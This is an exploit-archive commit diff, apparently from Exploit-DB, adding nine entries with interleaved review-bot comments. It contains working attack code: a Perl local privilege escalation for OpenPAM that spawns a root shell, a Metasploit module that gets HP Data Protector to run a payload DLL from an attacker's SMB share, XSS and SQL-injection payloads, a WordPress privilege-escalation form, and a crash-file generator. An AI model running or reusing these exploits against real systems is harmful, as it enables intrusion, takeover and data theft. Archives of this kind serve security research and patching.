Update: 2015-03-08

9 new exploits
Offensive Security 2015-03-08 08:37:21 +00:00
parent 4b5c85f4cb
commit 65bae5bbd0
10 changed files with 457 additions and 0 deletions


@ -32715,3 +32715,12 @@ id,file,description,date,author,platform,type,port
36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 'command_name' Parameter Remote Command Execution Vulnerability",2011-11-04,"Christophe de la Fuente",php,webapps,0
36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0
36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection Vulnerability",2011-11-08,Kalashinkov3,php,webapps,0
36296,platforms/bsd/local/36296.pl,"OpenPAM 'pam_start()' Local Privilege Escalation Vulnerability",2011-11-09,IKCE,bsd,local,0
36297,platforms/php/webapps/36297.txt,"AShop Open-Redirection and Cross Site Scripting Vulnerabilities",2011-11-09,"Infoserve Security Team",php,webapps,0
36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0
36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI <= 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0
36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 '.ogg' File Buffer Overflow Vulnerability",2011-11-11,swami,windows,dos,0
36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0
36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection Vulnerability",2011-11-14,E.Shahmohamadi,php,webapps,0
36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection Vulnerability",2015-03-06,"ITAS Team",php,webapps,80
36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,metasploit,windows,remote,5555
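Review bot: the `port` column is used inconsistently across the nine new rows: 36303 (ProjectSend, `webapps`) is recorded with port 80 while every other `webapps` row in the hunk, including the NetMRI entry whose own advisory shows `Host: netmrihost:443`, uses 0; pick one convention (0 for web applications, or the real service port as 36304 does with 5555) so the column stays usable as a filter. The description style also drifts within the batch (`... Vulnerability` suffixes on the SecurityFocus imports versus `WordPress Download Manager 2.7.2 - Privilege Escalation` and `ProjectSend r561 - SQL Injection Vulnerability`).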


platforms/bsd/local/36296.pl Executable file

@ -0,0 +1,52 @@
source: http://www.securityfocus.com/bid/50607/info
OpenPAM is prone to a local privilege-escalation vulnerability.
Local attackers may exploit this issue to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
#!/usr/bin/perl
# kcheckpass invoking pam_start() with user provided
# service argument, what a bad idea. OpenPAM accepts that.
# Maybe this pam_start() vulnerability is exploitable via
# other vectors as well.
# Vuln tested on a FreeBSD 8.1. It does not affect
# Linux PAM, as it is checking for / character
# (C) 2011 by some dude, meant as a PoC! Only use on your own
# machine and on your own risk!!!
#
# This commit is likely to fix the bug:
# http://trac.des.no/openpam/changeset/478/trunk/lib/openpam_configure.c
#
my $kcheckpass = "/usr/local/kde4/lib/kde4/libexec/kcheckpass";
# build suid shell
open(O,">/tmp/slam.c") or die $!;
print O<<EOC;
#include <stdio.h>
#include <unistd.h>
void __attribute__((constructor)) init()
{
char *a[] = {"/bin/sh", NULL};
setuid(0);
execve(*a, a, NULL);
}
EOC
close(O);
# build fake pam module
system("gcc -fPIC -Wall -c /tmp/slam.c -o /tmp/slam.o;gcc -shared -o /tmp/slam.so /tmp/slam.o");
# build fake PAM service file
open(O,">/tmp/pamslam") or die $!;
print O<<EOP;
auth sufficient /tmp/slam.so
EOP
close(O);
print "We need more Elchsalami! Happy birthday dude!\n";
exec("$kcheckpass -c ../../../tmp/pamslam -m classic");
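Review bot: the file is committed with the executable bit set, but `#!/usr/bin/perl` is on line 4 behind three lines of advisory prose (`source: http://www.securityfocus.com/bid/50607/info` and the two SecurityFocus sentences), so it will not run as a script and perl stops at the prose with a syntax error; move those lines into `#` comments below the shebang as the script's own header already does for its notes. The description lines also say nothing about the mitigation the script itself hints at: the comment `# Linux PAM, as it is checking for / character` and the pointer to OpenPAM changeset 478 together describe the fix (reject path separators in the caller-supplied service name), and stating that plainly in the header would make the entry useful to anyone triaging an OpenPAM build.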


@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/50646/info
Infoblox NetMRI is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Infoblox NetMRI versions 6.2.1, 6.1.2, and 6.0.2.42 are vulnerable; other versions may also be affected.
POST /netmri/config/userAdmin/login.tdf HTTP/1.1
Content-Length: 691
Cookie: XXXX
Host: netmrihost:443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
formStack=netmri/config/userAdmin/login&eulaAccepted=<script>alert(document.cookie)</script>&mode=<script>alert(document.cookie)</script>&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false
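Review bot: `Content-Length: 691` does not match the body shown beneath it, which is roughly 230 bytes with the `<script>` tags appearing decoded rather than URL-encoded, so the request as recorded is not what was sent; either restore the encoded body or drop the header so readers do not copy a mismatched length. The version line (`6.2.1, 6.1.2, and 6.0.2.42 are vulnerable; other versions may also be affected`) comes with no fixed release and no vendor reference, which is the one thing a defender needs from this entry.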

platforms/php/webapps/36297.txt Executable file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/50616/info
AShop is prone to multiple open-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary script or HTML code, steal cookie-based authentication credentials, and conduct phishing attacks. Other attacks may also be possible.
Versions prior to AShop 5.1.4 are vulnerable.
IE8
http://www.example.com/ashop/?&#039;"<script>alert(document.cookie)</script>
http://www.example.com/ashop/index.php?&#039;"<script>alert(document.cookie)</script>
http://www.example.com/ashop/picture.php?picture=" stYle=x:expre/**/ssion(alert(document.cookie)) ns="
http://www.example.com/ashop/index.php?language=&#039;"<script>alert(document.cookie)</script>
FF 7.1
http://www.example.com/ashop/index.php?searchstring=1&showresult=true&exp=&#039;"</script><script>alert(666);</script>&resultpage=&categories=off&msg=&search=index.php&shop=1
http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=&#039;"</script><script>alert(document.cookie)</script>&msg=
http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1&msg=&#039;"</script><script>alert(document.cookie)</script>
http://www.example.com/ashop/basket.php?cat=0&sid=&#039;"</script><script>alert(document.cookie)</script>&shop=1&payoption=3
Open Redirection
http://www.example.com/ashop/language.php?language=sv&redirect=http://www.google.com
http://www.example.com/ashop/currency.php?currency=aud&redirect=http://www.google.com
http://www.example.com/ashop/currency.php?redirect=http://www.google.com
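Review bot: the `&#039;` sequences in the IE8 and FF 7.1 URLs are the HTML entity for an apostrophe carried over from the SecurityFocus page, not part of the original test strings, so a reader copying the file verbatim tests something other than what was reported; either restore the literal character or note the transcription artifact. `Versions prior to AShop 5.1.4 are vulnerable` is the only remediation hint in the file; saying outright that 5.1.4 is the fixed release would save triage time. The `IE8` and `FF 7.1` labels are presumably the browsers each group was confirmed in, and the `Open Redirection` group shows the `redirect=` parameter on `language.php` and `currency.php` accepting an absolute external URL; one sentence stating both would make the grouping self-explanatory.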


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50637/info
Joomla! 'com_alfcontact' extension is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! 'com_alfcontact' extension 1.9.3 is vulnerable; prior versions may also be affected.
&email=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&emailid=5%2c%2cCareers%20at%20Foreground%20Security&emailto_id=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&extravalue=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&message=20&name=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&option=com_alfcontact&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge&subject=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&task=sendemail
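Review bot: the entry gives no fixed version and no vendor reference; the text only says `1.9.3 is vulnerable; prior versions may also be affected`, so a reader cannot tell whether the issue is closed. The body itself is informative and the writeup should say what it shows: `email`, `emailto_id`, `extravalue`, `name` and `subject` all carry the same `" onmouseover=prompt(document.cookie) "` string, an attribute-breakout shape, which indicates the values are reflected inside HTML attributes without escaping the closing quote, so the fix maintainers need is attribute-context escaping rather than tag stripping. Stylistically the hunk is a bare body fragment starting with a stray `&` and no request line, unlike the NetMRI entry in this same commit, which records the full request.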

platforms/php/webapps/36301.txt Executable file

@ -0,0 +1,47 @@
# Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation
# Date: 24-11-2014
# Software Link: https://wordpress.org/plugins/download-manager/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9260
1. Description
Every registered user can update every WordPress options using basic_settings() function.
function basic_settings()
{
if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') {
foreach ($_POST as $optn => $optv) {
update_option($optn, $optv);
}
if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form');
die('Settings Saved Successfully');
}
include('settings/basic.php');
}
http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html
2. Proof of Concept
Login as standard user (created using wp-login.php?action=register) then:
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings">
<input type="hidden" name="task" value="wdm_save_settings">
<input type="hidden" name="section" value="basic">
<input type="hidden" name="default_role" value="administrator">
<input type="submit" value="Hack!">
</form>
After that create new user using wp-login.php?action=register. Newly created user will have admin privileges.
3. Solution:
Update to version 2.7.3
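Review bot: the root cause visible in `basic_settings()` has two halves and the description names only one: there is neither a capability check (`current_user_can('manage_options')`) nor a nonce check (`check_ajax_referer`) before `foreach ($_POST as $optn => $optv) { update_option($optn, $optv); }`, and every POST key is passed straight to `update_option`, so any option name is writable, `default_role` included, which is why the form in section 2 changes the role given to new registrants. `3. Solution: Update to version 2.7.3` is fine as user advice, but the entry would serve maintainers better if it said the fix needs both an authorization check on the `wdm_settings` AJAX action and an allow-list of the option names the settings page is meant to save. Minor wording: `can update every WordPress options` should read `every WordPress option`.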


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50656/info
Content component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI]
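Review bot: this entry names neither an affected Joomla version nor a fixed one, and the files.csv row for it (`36302 ... Joomla Content Component 'year' Parameter SQL Injection Vulnerability`) is equally unversioned, so it cannot be matched against an installed release. The only technical content is one URL tagged `[BSQLI]` (blind SQL injection) with no indication of how the `year` parameter reaches the query in `com_content`'s archive view; at minimum record the Joomla version that was tested and the vendor fix, otherwise the entry stays unverifiable for anyone checking exposure.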

platforms/php/webapps/36303.txt Executable file

@ -0,0 +1,90 @@
#Vulnerability title: ProjectSend r561 - SQL injection vulnerability
#Product: ProjectSend r561
#Vendor: http://www.projectsend.org/
#Affected version: ProjectSend r561
#Download link: http://www.projectsend.org/download/67/
#Fixed version: N/A
#Author: Le Ngoc Phi (phi.n.le@itas.vn) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
GET /projectsend/users-edit.php?id=<SQL INJECTION HERE> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 54f8105d859e0_SESSION=q6tjpjjbt53nk1o5tnbv2123456;
PHPSESSID=jec50hu4plibu5p2p6hnvpcut6
Connection: keep-alive
- Vulnerable file: client-edit.php
- Vulnerable parameter: id
- Vulnerable code:
if (isset($_GET['id'])) {
$client_id = mysql_real_escape_string($_GET['id']);
/**
* Check if the id corresponds to a real client.
* Return 1 if true, 2 if false.
**/
$page_status = (client_exists_id($client_id)) ? 1 : 2;
}
else {
/**
* Return 0 if the id is not set.
*/
$page_status = 0;
}
/**
* Get the clients information from the database to use on the form.
*/
if ($page_status === 1) {
$editing = $database->query("SELECT * FROM tbl_users WHERE
id=$client_id");
while($data = mysql_fetch_array($editing)) {
$add_client_data_name = $data['name'];
$add_client_data_user = $data['user'];
$add_client_data_email = $data['email'];
$add_client_data_addr = $data['address'];
$add_client_data_phone = $data['phone'];
$add_client_data_intcont = $data['contact'];
if ($data['notify'] == 1) { $add_client_data_notity = 1; }
else { $add_client_data_notity = 0; }
if ($data['active'] == 1) { $add_client_data_active = 1; }
else { $add_client_data_active = 0; }
}
}
::DISCLOSURE::
+ 01/06/2015: Detect vulnerability
+ 01/07/2015: Contact to vendor
+ 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply
+ 03/05/2015: Public information
::REFERENCE::
-
http://www.itas.vn/news/itas-team-found-out-a-SQL-Injection-vulnerability-in
-projectsend-r561-76.html
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.
Best Regards,
---------------------------------------------------------------------
ITAS Team (www.itas.vn)
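Review bot: the escaping in the vulnerable code is the wrong kind for its context and the writeup should say so: `$client_id = mysql_real_escape_string($_GET['id']);` only escapes quote and backslash characters, but `$client_id` is then interpolated unquoted into `SELECT * FROM tbl_users WHERE id=$client_id`, so any value that contains no quotes passes through untouched. The fix is to treat `id` as an integer (`(int) $_GET['id']`) or bind it as a parameter; the `mysql_*` extension is deprecated anyway, so a prepared statement via mysqli or PDO is the real remediation, which matters given `Fixed version: N/A`. The query above only runs when `client_exists_id($client_id)` returns true, so the writeup should also say whether that helper builds the same unquoted query, since that is where a reader will look for the injection point. Two consistency issues: the request targets `users-edit.php` while `Vulnerable file:` says `client-edit.php`, and in the disclaimer `?AS IS?` is a pair of mis-encoded smart quotes and `ACCEPTANCE ACCEPTANCE` is duplicated.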

platforms/windows/dos/36300.py Executable file

@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/50651/info
Kool Media Converter is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Kool Media Converter 2.6.0 is vulnerable; other versions may also be affected.
#!/usr/bin/env python
#
#
# Exploit Title: Kool Media Converter v2.6.0 DOS
# Date: 10/10/2011
# Author: swami
# E-Mail: flavio[dot]baldassi[at]gmail[dot]com
# Software Link: http://www.bestwebsharing.com/downloads/kool-media-converter-setup.exe
# Version: 2.6.0
# Tested on: Windows XP SP3 ENG
#
#--- From Vendor Website
# Kool Media Converter is a sound tool addressed to casual listeners and fervent
# audiophiles likewise. It deals with compatibility problems between your audio files
# and the media player you are using to help you enjoy all the songs you love anyway you like.
#
#--- Description
# Kool Media Converter fails to handle a malformed .ogg file
ogg = b'\x4F\x67\x67\x53' # Capture Pattern OggS in ascii
ogg += b'\x00' # Version currently 0
ogg += b'\x02' # Header Type of page that follows
ogg += b'\x00' * 8 # Granule Position
ogg += b'\xCE\xc6\x41\x49' # Bitstream Serial Number
ogg += b'\x00' * 4 # Page Sequence Number
ogg += b'\x70\x79\xf3\x3d' # Checksum
ogg += b'\x01' # Page Segment max 255
ogg += b'\x1e\x01\x76\x6f' # Segment Table
ogg += b'\x41' * 1000
try:
f = open('koolPoC.ogg','wb')
f.write(ogg)
f.close()
except:
print('\nError while creating ogg file\n')
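Review bot: as with 36296.pl, the executable bit is set but `#!/usr/bin/env python` is on line 5 behind the SecurityFocus prose, so the interpreter fails at `source: http://...` before reaching the script; comment those lines out. Two comments inside the script mislead: `ogg += b'\x01' # Page Segment max 255` sets the segment count to 1, so only the next byte (`\x1e`) is the lacing table and the remaining bytes of `ogg += b'\x1e\x01\x76\x6f' # Segment Table` are already packet data; and the `# Checksum` value is a fixed constant rather than a CRC over the page, which is acceptable for a malformed-file PoC but should be labelled as intentionally wrong so nobody "fixes" it. Style: the bare `except:` swallows everything including `KeyboardInterrupt`; `except OSError` around a `with open('koolPoC.ogg', 'wb') as f:` block is enough.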

platforms/windows/remote/36304.rb Executable file

@ -0,0 +1,151 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'HP Data Protector 8.10 Remote Command Execution',
'Description' => %q{
This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary
commands can be execute by sending crafted requests with opcode 28 to the OmniInet
service listening on the TCP/5555 port. Since there is an strict length limitation on
the command, rundll32.exe is executed, and the payload is provided through a DLL by a
fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on
Windows 7 SP1.
},
'Author' => [
'Christian Ramirez', # POC
'Henoch Barrera', # POC
'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module
],
'References' =>
[
['CVE', '2014-2623'],
['OSVDB', '109069'],
['EDB', '34066'],
['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Privileged' => true,
'Platform' => 'win',
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'HP Data Protector 8.10 / Windows', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 02 2014'))
register_options(
[
Opt::RPORT(5555),
OptString.new('FILE_NAME', [ false, 'DLL File name to share']),
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
], self.class)
deregister_options('FOLDER_NAME')
deregister_options('FILE_CONTENTS')
end
def check
fingerprint = get_fingerprint
if fingerprint.nil?
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - HP Data Protector version #{fingerprint}")
if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
minor = $1.to_i
else
return Exploit::CheckCode::Safe
end
if minor < 11
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Detected
end
def peer
"#{rhost}:#{rport}"
end
def get_fingerprint
ommni = connect
ommni.put(rand_text_alpha_upper(64))
resp = ommni.get_once(-1)
disconnect
if resp.nil?
return nil
end
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
end
def send_pkt(cmd)
cmd.gsub!("\\", "\\\\\\\\")
pkt = "2\x00"
pkt << "\x01\x01\x01\x01\x01\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x01\x00 "
pkt << "28\x00"
pkt << "\\perl.exe\x00 "
pkt << "-esystem('#{cmd}')\x00"
connect
sock.put([pkt.length].pack('N') + pkt)
disconnect
end
def primer
self.file_contents = generate_payload_dll
print_status("File available on #{unc}...")
print_status("#{peer} - Trying to execute remote DLL...")
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
send_pkt(sploit)
end
def setup
super
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
unless file_name =~ /\.dll$/
fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
end
end
def exploit
begin
Timeout.timeout(datastore['SMB_DELAY']) {super}
rescue Timeout::Error
# do nothing... just finish exploit and stop smb server...
end
end
end
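Review bot: `send_pkt` mutates its argument with `cmd.gsub!("\\", "\\\\\\\\")`, so the string the caller built in `primer` (`sploit`) is rewritten under it; harmless today because `sploit` is not reused, but `cmd = cmd.gsub(...)` keeps the method side-effect free. The `minor < 11` threshold in `check` encodes the assumption that A.08.11 is the first fixed build, yet neither the description nor the references state the fixed version; cite the fixed release from the HP advisory next to the threshold so the check can be audited. The `exploit` override rescues `Timeout::Error` with an empty body (`# do nothing...`); a `print_status` saying the SMB share closed after `SMB_DELAY` seconds would let a user distinguish a timeout from a clean finish. Description grammar: `can be execute` should be `can be executed`, `an strict` should be `a strict`, and the name says 8.10 while the description says `tested successfully on HP Data Protector 8.1`.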